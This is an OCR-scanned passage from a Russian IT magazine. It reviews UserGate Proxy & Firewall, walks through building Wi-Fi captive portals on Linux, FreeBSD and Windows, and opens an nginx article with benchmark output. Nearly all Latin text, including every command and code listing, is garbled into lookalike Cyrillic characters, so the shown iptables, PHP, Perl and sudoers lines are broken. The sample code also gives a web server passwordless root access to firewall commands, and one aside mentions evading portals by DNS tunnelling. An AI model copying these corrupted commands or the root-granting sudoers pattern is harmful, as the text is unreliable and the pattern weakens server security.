при этом действие. Эти правила присваиваются отдельным пользователям 
или целым их группам и позволяют в автоматическом режиме контролиро- 



Дополнительные функции 

ВСТРОЕННЫЙ ѴРН-СЕРВЕР 

В УзегОаІе Ргоху & РігеѵѵаІІ 6.0 появился компонент 
ѴРМ-сервер. С его помощью можно организовать 
защищенный удаленный доступ сотрудников 
компании к локальной сети или объединить уда- 
ленные сети отдельных филиалов организации в 
единое информационное пространство. Данный 
ѴРМ-сервер обладает всеми необходимыми 
функциональными возможностями для создания 
туннелей «сервер — сервер» и «клиент — сервер» 
и маршрутизации между подсетями. 
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Отличительная черта этого файр- 
вола — предотвращение вторжений 
производится автоматически 



вать их работу в интернете. Всего реализовано четыре возможных действия. 
Первое из них — закрыть соединение. Оно позволяет, например, запретить 
загрузку определенных файлов, предотвратить посещение нежелательных 
сайтов и прочее. Второе действие — изменить тариф. Оно используется в си- 
стеме тарификации, которая интегрирована в рассматриваемый продукт (мы 
ее не рассматриваем, поскольку для корпоративных сетей она не особо акту- 
альна). Следующее действие позволяет отключить подсчет трафика, получае- 
мого в рамках данного соединения. В этом случае передаваемая информация 
не учитывается при подведении суточного, недельного и месячного потребле- 
ния. Ну и наконец, последнее действие — ограничение скорости до указанно- 
го значения. Его очень удобно использовать для предотвращения «забивания» 
канала при загрузке больших файлов и решении других подобных задач. 

Условий в правилах управления трафиком гораздо больше — около деся- 
ти. Некоторые из них относительно просты, например максимальный размер 
файла. Такое правило будет срабатывать при попытке пользователей загру- 
зить файл больше указанного размера. Другие условия привязаны ко вре- 
мени. В частности, среди них можно отметить расписание (срабатывание 
по времени и дням недели) и праздники (срабатывает в указанные дни). 

Однако наибольший интерес представляют условия, связанные с сайтами 
и контентом. В частности, с их помощью можно блокировать или устанавли- 
вать другие действия на определенные виды контента (например, видео, ау- 
дио, исполняемые файлы, текст, картинки и прочее), конкретные веб-проекты 
или целые их категории (для этого используется технология Епіепзуз УВЕ 
РіІІегіпд, см. врезку). 

Примечательно, что одно правило может содержать сразу же несколько 
условий. При этом администратор может указывать, в каком случае оно будет 
выполняться — при соблюдении всех условий или любого одного из них. Это 
позволяет создать очень гибкую политику использования интернета сотрудни- 
ками компании, учитывающую большое количество всевозможных нюансов. 

НАСТРОЙКА МЕЖСЕТЕВОГО ЭКРАНА 

Неотъемлемая часть драйвера МАТ УзегСаіе — межсетевой экран, с его 
помощью решаются различные задачи, связанные с обработкой сетевого 
трафика. Для настройки используются специальные правила, которые мо- 
гут быть одного из трех типов: трансляции сетевого адреса, маршрутиза- 
ции и файрвола. Правил в системе может быть произвольное количество. 
При этом применяются они в том порядке, в каком перечислены в общем 
списке. Поэтому если поступающий трафик подходит под несколько правил, 
он будет обработан тем из них, которое расположено выше других. 

Каждое правило характеризуется тремя основными параметрами. Пер- 
вый — источник трафика. Это может быть один или несколько определенных 
хостов, ѴѴАМ- или ЕАМ- интерфейс интернет-шлюза. Второй параметр — на- 
значение информации. Здесь может быть указан ІАМ- или ѴѴАМ -интерфейс 
или біаі-ир соединение. Последняя основная характеристика правила — это 
один или несколько сервисов, на которые оно распространяется. Под сер- 
висом в ІІзегОаІе Ргоху & РігеѵѵаІІ понимается пара из семейства протоколов 
(ТСР, УОР, ІСМР, произвольный протокол) и сетевого порта (или диапазона се- 
тевых портов). По умолчанию в системе уже есть внушительный набор пред- 
установленных сервисов, начиная с общераспространенных (НТТР, НТТРз, 
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Дополнительные функции 

КОНТРОЛЬ СЕТЕВЫХ 
ПРИЛОЖЕНИЙ 

В УзегОаІе Ргоху & РігеѵѵаІІ реализована такая интересная возмож 
ность, как контроль сетевых приложений. Ее цель — запретить 
доступ к интернету любого несанкционированного ПО. В рамках 
настройки контроля создаются правила, которые разрешают или 
блокируют сетевую работу различных программ (с учетом версии 
или без него). В них можно указывать конкретные ІР-адреса и пор- 
ты назначения, что позволяет гибко настраивать доступ ПО, раз- 
решив ему выполнять только определенные действия в интернете, 
Контроль приложений позволяет выработать четкую корпора- 
тивную политику по использованию программ, частично предот- 
вратить распространение вредоносного ПО. 




□М8, ІСО) и заканчивая специфическими (ѴѴеЬМопеу, РАсІтіп, различные 
онлайн-игры и так далее). Однако при необходимости администратор может 
создавать и свои сервисы, например описывающие работу с онлайн-банком. 

Также у каждого правила есть действие, которое оно выполняет с под- 
ходящим под условия трафиком. Их всего два; разрешить или запретить. 
В первом случае трафик беспрепятственно проходит по указанному маршру- 
ту, а во втором блокируется. 

Правила трансляции сетевого адреса используют технологию МАТ. С их 
помощью можно настроить доступ в интернет рабочих станций с локальными 
адресами. Для этого необходимо создать правило, указав в качестве источ- 
ника ЕАМ-интерфейс, а в качестве приемника — ѴѴАМ-интерфейс. Правила 
маршрутизации применяются в том случае, если рассматриваемое решение 
будет использоваться в качестве роутера между двумя локальными сетями 
(в нем реализована такая возможность). В этом случае маршрутизацию мож- 
но настроить для двунаправленной прозрачной передачи трафика. 

Правила файрвола используются для обработки трафика, который по- 
ступает не на прокси-сервер, а непосредственно на интернет-шлюз. Сразу 
после установки в системе есть одно такое правило, которое разрешает все 
сетевые пакеты. В принципе, если создаваемый интернет-шлюз не будет 
использоваться как рабочая станция, то действие правила можно сменить 
с «Разрешить» на «Запретить». В этом случае на компьютере будет блокиро- 
вана любая сетевая активность, кроме транзитных МАТ-пакетов, передаю- 
щихся из локальной сети в интернет и обратно. 

Правила файрвола позволяют публиковать в глобальной сети любые ло- 
кальные сервисы: веб-серверы, РТР-серверы, почтовые серверы и прочее. 
При этом у удаленных пользователей появляется возможность подключения 
к ним через интернет. Как пример можно рассмотреть публикацию корпора- 
тивного РТР-сервера. Для этого админ должен создать правило, в котором 
в качестве источника выбрать пункт «Любой», в качестве назначения указать 
нужный ѴѴАМ-интерфейс, а в качестве сервиса — РТР. После этого выбрать 
действие «Разрешить», включить трансляцию трафика и в поле «Адрес назна- 
чения» указать ІР-адрес локального РТР-сервера и его сетевой порт. 

После такой настройки все поступающие на сетевые карты интернет- 
шлюза соединения по 21-му порту будут автоматически перенаправляться 
на РТР-сервер. Кстати, в процессе настройки можно выбрать не только «род- 
ной», но и любой другой сервис (или создать свой собственный). В этом слу- 
чае внешние пользователи должны будут обращаться не на 21-й, а на иной 
порт. Такой подход очень удобен в тех случаях, когда в информационной си- 
стеме есть два или более однотипных сервиса. Например, можно организо- 
вать доступ извне к корпоративному порталу по стандартному для НТТР порту 
80, а доступ к веб-статистике ІІзегОаІе — по порту 81 . 

Аналогичным образом настраивается внешний доступ к внутреннему по- 
чтовому серверу. 

Важная отличительная черта реализованного межсетевого экрана — си- 
стема предотвращения вторжений. Она работает полностью в автоматиче- 
ском режиме, выявляя на основе сигнатур и эвристических методов попытки 
несанкционированного воздействия и нивелируя их через блокировку пото- 
ков нежелательного трафика или сброс опасных соединений. 

ПОДВОДИМ ИТОГИ 

в этом обзоре мы достаточно подробно рассмотрели организацию совмест- 
ного доступа сотрудников компании к интернету. В современных условиях это 
не самый простой процесс, поскольку нужно учитывать большое количество 
различных нюансов. Причем важны как технические, так и организационные 
аспекты, особенно контроль действий пользователей. ^ 




ИСПЫТАНИЕ 
ГОСТЯМИ 1 

РАЗВОРАЧИВАЕМ ѴѴІ-РІ НОТ8РОТ С ИСПОЛЬЗОВАНИЕМ 
ТЕХНОЛОГИИ САРТІѴЕ РОРТАЕ 



При организации гостевого подключения к ин- 
тернету в конференц-залах, публичных библио- 
теках и кафе особое внимание следует уделить 
обеспечению безопасности и максимально 
простой аутентификации. Технология под на- 
званием Сарііѵе Рогіаі призвана в этом помочь. 

КАК РАБОТАЕТ САРТІѴЕ РОВТАІ 

Все пользователи, которые хотят подключиться к публичной ѴѴі-Рі-сети и вый- 
ти в интернет, вначале проходят через шлюз, который представляет собой 
комп с несколькими сетевыми интерфейсами. Шлюз действует как маршру- 
тизатор и брандмауэр, а для возможности авторизации пользователя при по- 
мощи браузера он содержит еще и веб-сервер. Для аутентификации клиентов 
может использоваться внутренняя база данных или внешний ВАОШЗ-сервер. 
Все пакеты от «неавторизованных» пользователей помечаются на брандма- 
уэре, и посетитель переправляется на специальную веб-страницу (Сарііѵе 



РоіТаІ), где он может ознакомиться с условиями подключения и ввести логин/ 
пароль (либо код доступа). После аутентификации пользователя произво- 
дится идентификация компьютера, за которым он работает, его МАО- и ІР- 
адреса заносятся в белый список брандмауэра. В самом простом случае 
пользователь может вообще не проходить аутентификацию, Сарііѵе РогЩІ ав- 
томатически получает ІР- и МАС-адреса компьютера, которые сразу подстав- 
ляются в правилах брандмауэра. В последующем все пакеты проходят через 
маршрутизатор без ограничений. Дополнительно, в зависимости от роли, 
могут устанавливаться ограничения по скорости, времени, трафику или по- 
сещаемым ресурсам. 

В настоящее время существует несколько проектов, позволяющих быстро 
развернуть Сарііѵе Рогіаі: ѴѴі^ібод (ууЩбщюгз). РаскеІРепсе ( оаске^епсе. 
ого ). СИіІІіЗроІ (сЫШзшЦпіо) и веб-интерфейс ЕазуНоІзроІ (еазѵИоІзроМпоѵ. 
азіа) . КАТТІѴЕ (каЩуеЛі), РеррегЗроІ ( реорегзроі.зіпе! ) и ]кар1іѵе ( ікарііѵе. 
зіпе^ ). Выбор конкретного решения зависит от необходимых функций и под- 
держиваемых ОС. Например, СИіІІіЗро^ официально поддерживает несколь- 
ко дистрибутивов Ыпих, РгееВЗО, ОрепВЗО и ОрепѴѴВТ. К слову, это един- 
ственное приложение, пакет которого доступен в официальном репозитории 
иЬип!и, и установить его просто: 

$ зисіо ар-іі-^еі: іпзііаіі сЬіІІізроІ: 
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Для организации простого портала без поддержки внешних средств ау- 
тентификации хватит и решения вроде ікар^іѵе, а вот чтобы разобраться 
со всеми возможностями, заложенными в РаскеІРепсе, потребуется опре- 
деленное время. Некоторые из представленных проектов уже прекратили 
свое развитие, но все наработки по-прежнему актуальны. Также можно найти 
модули для различных языков, позволяющие самостоятельно создать Сарііѵе 
РоіТаІ из подручных средств. Например, для РегІ он так и называется — 
СарІіѵе::РоіТаІ [ѵи;1асрап.Ц! д/ гп(.)с1ик- Са:)1іѵг‘:-РогігіІ), есть модуль 

для Ру!11оп/О]апдо аоііааіе.ого.аи ). 

Кроме этого, ряд дистрибутивов-роутеров предлагает возможность бы- 
строго создания Сарііѵе РоіТаІ буквально парой щелчков мышки: Упіапдіе 
(цр^ап діе.сот ), рГЗепзе ( р^зепзе.огд ). 2егозИе11 ( гегозііеіі.пе! ). тОпОѵѵаІІ 
( тОпО.сН ). СІеагОЗ ( сіеаг^оипбагіоп.сот ) и Іепіуаі ( гепіѵаі.ого ). Но при же- 
лании или если невозможно изменить текущую конфигурацию сети нужные 
скрипты легко создать самостоятельно. Этим мы и займемся. 

НАСТРАИВАЕМ САРТІѴЕ РОНТАІ В ЫНУХ 

Разобравшись, как работает Сарііѵе Рогіаі, легко реализовать его штатны- 
ми средствами Ыпих. Причем доступно несколько способов — маркировка 
и блокировка пакетов, пришедших от неавторизованных пользователей, ис- 
пользование цепочки правил или шаманство с МАТ. Дополнительно на лету 
можно перенастраивать правила прокси-сервера ЗдиісІ или контент-фильтра 
□апзСиагсІіап, что позволит управлять выходом в интернет на уровне групп 
пользователей, да и просто кешировать и фильтровать информацию, блоки- 
руя доступ к нежелательным ресурсам. И кстати, именно такой подход при- 
меняется в специализированных дистрибутивах. 

Для примера разберем вариант использования отдельной цепочки 
и ОапзСиагсІіап. Первым делом создаем правила пакетного фильтра: 

# Очищаем правила 

еЫаЫез -'I: Ьгои1:е -Р 

еЫіаЫез -Р 



# Переправляем .пак^^ порту на стек ірІіаЬІез 

еЫіаЫез -1: Ьгоиііе -А ВРОІЯІМС -р ІРѴ4 --ір-ргріосоі б - 
--ір-сІе 5 І:іпа 1 :іоп-рог 1 ; 80 -3 гесіігесі: --гесІігес-1;--1:агее1: АССЕРТ 

Не забываем разрешить специфические низкоуровневые протоколы: 

еЬііаЬІез -А ІМРдт -р АКР -3 АССЕРТ 
еЫіаЬІез -А РОКЫАКО -р АКР -3 АССЕРТ 
еЬТаЫез -А ОиТРОТ -р АКР -д АССЕРТ 

То же пишем и для ІЕМОТН, и ІРѵ4. Теперь создаем правила для ірІаЫез: 

ірІіаЫез -N сарТіѵе 
ірТаЫез -Р сарТіѵе 
ір 1 :аЫе 5 .„-Р РОКІлІАКО ОКОР 



# П.ереправляем пакеты^ идущие к. порту 80^ . на 8080,. где 

^ работает ОапзСиагсІіап 

іріаЬІез -1: паТ -I РКЕКООТІМС -і Ьг0 -р іср --сірогі 80 -3 ^ 
КЕОІКЕСТ --То-рогііз 8080 

іріаЫез -Т па! -I РКЕКО^ТINС -і е1:Ь0 -р Тер --сІрогТ 80 -3 ^ 
КЕОІКЕСТ --То-рогТз 8080 

ірТаЫез -Т паТ -I РКЕКО^ТINС -і еТЬІ -р Тер --сІрогТ 80 -3 
КЕОІКЕСТ --То-рогТз 8080 



^. Создаем цепочку, для .ІАМ 

ірТаЫез -А РОКІлІАКО -з 192.168.1.0/24 -3 сарТіѵе 
ірТаЫез -А РОКІлІАКО_-а 192.168.1.0/24 -3 сарТіѵе 



# Разрешаем лока.л.ь^ (добавляем все необходимые, сети) 

ІрТаЫез -I РОКІЛІАКО -р Тер -з 192.168.1.0/24 -сі 
192.168.1.0/24 -3 АССЕРТ 

ірТаЬІез -I РОКІЛІАКО -р исір -з 192.168.1.0/24 -сІ 
192Л68. 1. 0/24 -3 АССЕРТ ' 



ІрТаЫез -А сарТіѵе -3 КЕТ^КN 

Не забываем разрешить ІСМР, ОМЗ, ОНСР и прочие необходимые протоколы. 

Здесь, кстати, есть один важный момент: многие админы не заморачи- 
ваются и разрешают весь ОМЗ-трафик. Этим пользуются некоторые юзве- 
ри для получения доступа в Сеть при помощи технологии ОМЗ Іиппеііпд. Ко- 
нечно, итоговая скорость небольшая, но вполне достаточная, чтобы сидеть 
в аське, писать в твиттер или отдавать команды по ЗЗН. И главное — при этом 



Дополнительные функции 

НАСТРАИВАЕМ САРТІѴЕ РОРТАЕ В 2ЕНТѴАЕ 

Если под Сар!іѵе РоііаІ выделяется новый сервер и все настройки нужно про- 
извести в короткое время, то лучше обратиться к специализированным ре- 
шениям, где все необходимое делается буквально парой нажатий клавиш. 
Яркий пример — серверный дистрибутив Іеп^аІ ( геп^аі.ого ). ориентирован- 
ный на малые и средние корпоративные сети. Он может выступать в любой 
из четырех ролей сетевого шлюза, ОТІісе Зегѵег, сервера коммуникаций и ин- 
фраструктуры. Для поддержки Сарііѵе РогіаІ следует во время установки ак- 
тивировать одноименный модуль (активируется роль Оаіеѵѵау и все сопутству- 
ющие пакеты). Затем в мастере первичной настройки правильно указываем 
на ЕАМ- интерфейс. Создаем учетные записи пользователей и группы. Далее 
в интерфейсе настройки Іепіуаі переходим в меню Сарііѵе Рогіаі и отмечаем 
в поле «Сарііѵе-интерфейсы» нужный, выбираем группу, участники которой 
будут иметь доступ, и указываем порт, на который будут перенаправляться 
пользователи. Вот и все. Теперь любой, кто желает подключиться к сети, вво- 
дит свои учетные данные, если аутентификация проходит успещно, появляет- 
ся всплывающее окно, которое нужно держать открытым. Чтобы отключиться, 
достаточно нажать кнопку «Выйти» или просто закрыть окно браузера. 

Если имеем шлюз, построенный на ІІЬипШ, то для установки связанных 
с 2еп1уа1 приложений проще использовать специальный репозиторий: 

$ зисіо асІсІ-арі-героБІіогу рра: 2 еп 1 ;уа 1 / 3.0 
$ зисіо арі-^еі ирсіаіе 

После чего команда зисіо арі-сасЬе зеагсЬ гепіуаі покажет более 20 мо- 
дулей 2епІуаІ. 




Выбираем пакеты для установки СарТіѵе Рогіаі в 2еп1уаІ 



везде засветится ІР твоей сети, а в логах какие-либо записи о несанкциони- 
рованной деятельности будут отсутствовать, ведь не каждый админ пишет 
все запросы в журнал ОМЗ-сервера. Поэтому лучше строго указать разре- 
шенные серверы. 

іріаЫез -I РОКІЛІАКО -р іер -з 192.168.1.0/24 -д - 
8.8.8.8/32-3 АССЕРТ 

ІрТаЫез -I РОКІЛІАКО -р исІр -з 192.168.1.0/24 -сІ - 
8.8.8.8/32 -3 АССЕРТ 

В принципе, на этот момент ничего особенного нет. Суть Сарііѵе Рогіаі 
заключается в добавлении нужных правил на лету. Для этого понадобится 
скрипт, который будет получать ІР/МАС и передавать их пакетному фильтру. 
Полностью НТМС-страницу приводить здесь нет смысла, поэтому ограни- 
чимся ключевыми моментами с нужным функционалом. На странице, куда 
перенаправляется пользователь, должен быть следующий код, получающий 
ІР- и МАС-адреса: 




1^0 



ЗУЫ/АСК 
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В 2еп(уа1 настройки Сарііѵе РоПаІ производятся простой установкой значений 




Новые правила іріаЫев, появляющиеся в 2епіуаІ после активации Сарііѵе Рогіаі 



<?р1ір 

$ір = $_5ЕКѴЕК[’КЕМ0ТЕ_А00К'1; 

$агр = "/изг/БЬіп/агр"; 

$тас = 5Ье11_ехес("5исІо $агр -ап " , $ір); 

рге§_та1:сіі( 7 . , ; . , : . : . . : , . ./ 7$тас д ІтаІісЬез) ; 

$тас = @$та1:сІіе5[0]і„ 

іі( $шас === N^11) { есИо "Асеевѣ ОепіесІ."; ехі1:; } 

?> 

<-Рргт ітіе1:Ьр(^="ро5І'Ѵ ас1:іоп='‘ас1^ 

<іпри1: 1:уре="ЬісІсІеп" пате="тас" 

ѵа1ие="<?рІір есЬо $тас; ?>" /> 

<іпри1: 1:уре="ЬісІсІеп’‘ пате="ір" ^ 

ѵа1ие="<?рІір есЬо $ір 

<іпрц1: 1:уре="5иЬті-Ь'\^Ѵ ♦-< 

5-Ьу1е="расіс1іпе:10рх 20рх;" /> 

</-Рогт> 

При необходимости добавляем поле для проверки логина и пароля, нуж- 
ные примеры легко найти в интернете. Далее в этом же скрипте подставляем 
полученные данные в правила ірІаЫез и ОапзОиагРіап, после чего перезапу- 
скаем последний: 

ехесС'зисІо /БЬіп/ірІаЫез-Ьіп -I сарііѵе -5 

{$_5ЕКѴЕР['КЕМ0ТЕ_А00К*]} “3 саріііѵе"); 

ехесС'зисІо /5Ьіп/ір1:аЫе5-Ьіп -I сар1:іѵе 

{$_5ЕКѴЕК['КЕМ0ТЕ_А00К’]} сар1:іѵе**); 

ехесС'ЧоисИ /е1:с/сІап5ёиагсІіап/1і5-Ь5/аи1:Іір1ибіп5/ір8гоир5‘’); 
ехесС'есЬо \’Ч$_5ЕКѴЕК[ ’ КЕМОТЕ^АООК' ]} = Шег1\" » ^ 
/е-^с/сІап5§иагсІіап/1І5І:5/аи1:Ьр1и§іп5/ір§гоир5" ) ^ 
ехес ( ’^БиОр ./з.Ьіп/Бегуі сІапБбиагсІіап геіоасі" ) ; 

После подключения клиента запись в /еІс/ОапБдиагРіап/ІізІз/аиІІірІидіпз/ 
ірдгоирз будет выглядеть так: 

192.168ѵ1Л00 = Шегі 

Параметр ^іКегІ указывает на группу фильтров, так мы можем устанавли- 
вать специфические настройки для всех пользователей, подключающихся 
посредством Сарііѵе Рогіаі. При необходимости так же легко в ОапзОиагРіап 
подставляется и логин пользователя, для реализации индивидуальных пра- 
вил. Не забываем разрешить фильтр ІР в бапздиагсІіап.сопТ: 

$ Бисіо папо /е1с/с1апБбиагсІіап/0апБ§иагсІіап.соп-Р 

аиіііріибіп = Ѵе1:с/сІапБ§иагсІіап/аи1:Іір1и8ІпБ/ір.согтР' 

Так как используемые системные команды может выполнять только гооі, 
немного подправим зибоегз, чтобы их мог запускать и веб-сервер: 

$ Бисіо папо /еІс/БисІоегБ 



\лдл/м-сІа1:а А11=(гоо1:) М0РА55Ш: /БЬіп/ірТаЬІеБ-Ьіп 

\л/\л/\л/-сіа1:а А11=(гоо1:) М0РА551лЮ: /БЬіп/Бегѵісе 

шм-ОаТа АІІ=(гоо1і) МОРА55Ш: /БЬіп/агріпб 

Вот мы и реализовали простейший Сар^іѵе Рогіаі. Если хотспот будет 
работать сутками, следует побеспокоиться, чтобы через некоторое время 
таблица очищалась. Здесь можно придумать несколько вариантов. Напри- 
мер, параллельно создавать задание для сгоп, которое будет срабатывать 
через определенное время, убирая правило. Другой вариант — прописывать 
данные сессии в отдельный файл, а затем при помощи сгоп или при каждом 
вызове РНР-скрипта анализировать время создания файла и удалять уста- 
ревшие записи. В Іепіуаі, например, после регистрации пользователя откры- 
вается отдельное окно, а в каталоге /ѵаг/ІіЬ/2еп1уаІ-сар1іѵерог1аІ/зеззіопз соз- 
дается файл, содержащий все данные сессии (ІР- и МАС-адрес). Как только 
пользователь закрывает Рорир, вся информация и правила очищаются. 

НАСТРОЙКА САРТІ ѴЕ РОНТАІ В РНЕЕВ50 

Понимая, как работает пакетный фильтр, и владея навыками разработки 
на языке, используемом в веб, легко организовать Сарііѵе РоПаІ в любой 
ОС. И *В80 здесь не исключение, причем реализация при помощи ІРРѴѴ 
выглядит даже проще. Принцип остается тем же, что и ранее. Все пакеты 
от неавторизованных пользователей блокируем и перенаправляем на веб- 
страницу. После того как гость подтверждает информацию, разрешаем 
выход в Сеть. Для удобства всю информацию об авторизованных ІР будем 
сохранять в базу данных (в примере текстовый файл). Заносим в системный 
файл вроде /еіс/гс.іосаі (а лучше в отдельный, чтобы было легче искать) не- 
обходимые переменные: 

# фа й л с . ба ЗО Й ..р.азреше и ных . . I Р _ 

$с1Ь = "/Ітр/БеББІоп.сІЬ"; 

# .І Р - аіще с . и . п 

$§а1;еѵ\/ау = "192. 168.0. 100^ 8080"; 

# Подсеть Іліі-Еі 

$мпе1: = "192.168.1.0/24"^ 

# Проводная ІАП 

$рпе1;„=. "192.168.0.0/24"; 

Список порт. 0 .в,^^^.к^^ блокировать и форвардить 

$-р\л/с1рог1:Б = "80^21,23^25,110,443"; 

# .Группировка правил брандмауэра 

$Бе1:пит = "Беі: 5"; 

# Начальный номер правил для блокировки и. фор.варАИ.нга^ 

# .желательно сделать число большим, чтобы не мешать текущим 

# установкам 
$-РмсІги1епит = "50000"; 

#..До6авляем правило форвардинга 

ір-Рѵ\/ -д асіеі $-Рмс1ги1епит $Бе1:пит -РмсІ $еа1;емау 1:ср -Ргот $мпе1: ^ 
1:о апу $-Ріл/с1рог1:Б 

# .Запреідаем вш.ОД с Ш-Рі нужно, конечно). 

$сІепуги1епит = $-РмсІги1епит + 1; 

ір-Рм -д асИ $сІепуги1епит $Бе1;пит сіепу а11 -Ргош $мпе1: 1:о $рпе1: 
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Испытание гостями 



^ 3 ^ 



в веб-страницу добавляем следующий код. В примере пользователь 
в чекбоксе просто подтверждает некие условия, результат отправляется РегІ- 
скрипту ассезз.рі. 

іпсІех.ЫтІ 

< -Ро гт па те = " -Ро гт 1 " теі Ь осі = " ро 5 " а с і о п = " а с с е 5 5 . р 1 " > 

<сІіѵ а1і§п="сеп1:ег"> 

<іпри1: пате="5иЬті1:'’ 1 :уре="$иЬті 1 :" ісі="5иЬті-1:" 

ѵа1ие="І Абгее"> 

</сІіѵ> 

</іРргт> 



Здесь РегІ выбран исключительно для разнообразия, при желании можно 
переработать РНР-код, показанный выше. Сам скрипт: 

ассе$5.р1 

#!/и5г/Ьіп/рег1 _ 

гедиіге 5,004і 

изе Рспііі рм(:0ЕРАиіТ); 

# Для доступа к файлу . используем 

Хрепі ІРС., р.е г1 ... .0 і 1е. .. ЬТт.І }... 

изе N^ВМ__Рі1е; 



Получаем. .ІР .прдьзрв^^^ 
$и$ЕКІР = $ЕNV{КЕМОТЕ_А^^К}; 



# Файл .базы данных 

$сІЬ = 'Ѵі:тр/5е55іоп.с1Ь"; 



# Заносим ..данные ...І.Р....В. .ф.а..й.л....и...до6.авля.ем...р.а.з.рещ.ающее пр 
1:іе %Ьа5Ь^ "М0ВМ_Рі1е", $сІЬ^ 0_К0МКІ0_СКЕАТ, 0644; 
$Ііа5Іі{и5егір} = $и5ЕКІР; _ 

$ги1епит--; 

5у5-1:ет("ір-Рѵ\/ а66 $ги1епит ІзеТпи.т .аІІРм а1і 

апу*'1і 

ипТіе %Ріа5Іі; 



р г і пТ " До с ту п ра 3 реше н \ п " ; 

При желании дополняем скрипт проверкой МАС-адреса и перестройкой 
правил прокси-сервера. Вызвав функцию 1іте{), мы также можем сохранить 
время соединения (в секундах), которое затем использовать для сброса ста- 
рых соединений. 

ассезз.рі 

$Т5ТАМР = ТітеО; 

# Дрб.а.вляем в вызов "Сіе 



$Иа5Іі{1:іте} = $Т5ТАМР; 
$Ма5Іі{и5егір} = $и5ЕКІР; 



# Проверяем^ .что. врем.я сессии - выщ^^ легко .найти 




Интерфейс настройки Сарііѵе Рогіаі в рІЗепве 



# В ...интер.нет.еХл..и....с.нимае.м пр.а.в 

.(.вр.емя. .вшдо) { 

5у5І:ет("ір‘Рѵ»; -р сіеіеіе $5е1:пит"); 
ип11пк("$йЬ"); 

ехіі;(0); 

} . 



САРТІѴЕ РОНТАІ НА ѴѴІМООѴѴ8 

Организовать Сар^іѵе РогТаІ на ѴѴіпсІоѵѵз штатными средствами проблема- 
тично из-за особенностей работы брандмауэра (который, кстати, начал кон- 
тролировать исходящие соединения только с Ѵізіа), поэтому в любом случае 
придется обращаться к сторонним решениям. Выбор здесь не особенно ве- 
лик — ОМ8 Ресіігесіог ( сіпзгесіігесіог.сот ). РігзіЗроІ ( оаІгопзоЙ.сот/ТігзІзоо^ ^. 
РаскеІРепсе ( раске^епсе-ого ). туѴѴІРІгопе ( тѵѵѵі^ігопе.сот . работает под 
ѴѴіпХР/2к), ѴѴіТісІод ( ѵѵтсіод.ога ) и Апіатесііа НоіЗроІ ( апЩтебіа.сот ). Из них 
бесплатны РаскеІРепсе и ѴѴіЯбод. Первый требует некоторой подготовки, 
а используемые во втором компоненты, такие как АрасЬе, РНР, РозІдгеЗОІ, 
удобнее разворачивать на *піх-системе. 

Из перечисленных наиболее функционален АпЩтесІіа НоіЗроІ, который 
позволяет организовать свободный и предоплаченный доступ (по трафику, 
времени или скорости), управлять пропускной способностью, гарантируя 
нужную скорость разным клиентам, блокировать нежелательные сайты, полу- 
чать статистику и многое другое. Развертывание Апіатесііа Но^Зроі не пред- 
ставляет особой сложности, в режиме простой установки все компоненты 
(хотспот, интерфейс оператора и база данных) устанавливаются на один ком- 
пьютер. Разобраться с первоначальными установками помогает визард, ин- 
терфейсы настраиваются автоматически, пользователь может также выбрать 
внешний вид страницы регистрации. Дальнейшее управление производится 
при помощи понятного интерфейса. 

ЗАКЛЮЧЕНИЕ 

Организовать точку доступа с различными вариантами использования не так 
уж и сложно. Выбор конкретного решения зависит от наличия времени 
на подготовку и желания копаться в настройках. Все представленные схемы 
можно легко развить до требуемого уровня. ^ 




Мастер настройки Апіатесііа НоіЗроІ 



Создание тарифного плана в Апіатесііа НоіЗроІ 
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Детальное описание 
ЯТМР-модуля пдіпх 
от самого автора; 
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тШШ 

Домашняя 
страница Ісдіѵѵгар: 

Оригинальная статья 
о микрокешировании; 



Мдіпх стремительными темпами на- 
бирает популярность, превращаясь 
из просто ускорителя отдачи статики 
для АрасИе в полнофункциональный 
и развитый веб-сервер, который все 
чаще применяется обособленно. 

В этой статье мы поговорим об инте- 
ресных и нестандартных сценариях 
использования пдіпх, которые позво- 
лят выжать из веб-сервера максимум. 
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Новые горизонты 
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ПОЧТОВЫЙ ПРОКСИ 

Начнем с самого очевидного — со способности пдіпх выступать в роли по- 
чтового прокси. Эта функция есть в пдіпх изначально, а вот используется 
в продакшн она почему-то крайне редко, некоторые так и вообще не догады- 
ваются о ее существовании. Как бы там ни было, пдіпх поддерживает прок- 
сирование протоколов РОРЗ, ІМАР и 8МТР с разными методами аутентифи- 
кации, включая 881 и 81аг1:ТЬ8, причем делает это очень быстро. 

Зачем это нужно? Есть как минимум два применения данной функцио- 
нальности. Первая: использовать пдіпх в качестве щита от назойливых спа- 
меров, пытающихся отправить мусорные письма через наш 8МТР-сервер. 
Обычно спамеры не создают много проблем, так как быстро отшибаются 
на этапе аутентификации, однако, когда их становится действительно мно- 
го, пдіпх поможет сэкономить процессорные ресурсы. Вторая: использовать 
пдіпх для перенаправления пользователей на несколько почтовых РОРЗ/ 
ІМАР-серверов. С этим, конечно, мог бы справиться и другой почтовый прок- 
си, но зачем городить огород серверов, если на фронтенде уже установлен 
пдіпх для отдачи статики по НТТР, например? 

Почтовый прокси-сервер в пдіпх сделан не совсем стандартно. Он ис- 
пользует дополнительный слой аутентификации, реализованный средства- 
ми НТТР, и, только если пользователь проходит этот барьер, он пропускается 
дальше. Обеспечивается такая функциональность путем создания страни- 
цы/скрипта, которой пдіпх отдает данные пользователя, а она/он возвра- 
щает ответ в виде стандартных ОК или причины отказа (типа «ІпѵаІісІ Іодіп ог 
ра55\л/огс1»). Скрипт запускается со следующими заголовками: 

Входные данные скрипта аутентификации 
НТТР_АиТН_и5ЕК: юзер 
НТТР_АиТН_РА55: пароль 

НТТР_АиТН_РК0Т0С01 почтовый протокол (ІМАР^ РОРЗ или 5МТР) 

А возвращает такие: 

Выходные данные скрипта аутентификации 
НТТР_А1ЯН_5ТАТ1)5 ОК или причина отказа 

НТТР_АЦТН_5ЕКѴЕК: реальный почтовый сервер 

для перенаправления 

НТТР_Аитн_РОКТ: порт сервера 



ИТИЕ Ігапз^еггесі : 
Кериезіз рег зесопР: 
Тіте рег гедиезі: 

Тіте рег гедиезі: 
Тгапз-Гег гаіе: 

Соппесііоп Тітез (шз) 



1145170 Ьуіез 
9.94 [#/зес] (теап) 

402.412 [шз] (теап) 

100.603 [тз] (теап, асгозз а11 сопсиггепі гедиезіз) 
58.02 [КЬуіез/зес] гесеіѵесі 





тіп 


теап[+/-зсі] 


тесііап 


тах 


|Соппесі : 


0 


0 3.1 


0 


40 


ІРгосеззіпд: 


84 


400 177.6 


386 


1022 


ІИаіііпд: 


84 


400 177.5 


386 


1022 


Тоіаі : 


84 


401 177.6 


386 


1022 


Регсепіаде оі 


іИе гедиезіз зегѵегі шііЬіп а с 



50% 


386 


66% 


